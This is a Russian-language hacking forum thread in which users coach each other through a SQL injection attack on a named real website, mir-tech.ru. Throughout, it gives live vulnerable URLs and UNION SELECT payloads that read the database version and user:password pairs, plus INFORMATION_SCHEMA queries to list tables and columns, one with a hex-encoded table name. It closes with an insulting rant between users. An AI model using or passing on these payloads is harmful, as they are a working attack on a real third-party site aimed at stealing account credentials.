Вот SQL-inj Code: http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1 Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
Там не смотрел, но вот тут она точно есть Code: хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*- Unknown column 'user' in 'field list' Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици: Code: union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/* А потом колонки в интересующей нас табле: Code: union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Уже надеялся что все.. Смотрю название таблы - http://mir-tech.ru/group.php?cat=-1+union+select+TABLE_NAME+fron+INFORMATION_SCHEMA.TABLES limit 0,1/* Называется CHARACTER_SETS. Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???
http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=0x4348415241435445525f53455453 limit 0,1/*
Qwertison у тя с головой все ок??? я втеме ваши уячзвимости написал тчо икак .... меня бесят такие люди.. тока флудить могут какого зхрена ты создаешь тему клоН?????? ваще чтоли даун... больше слов нет
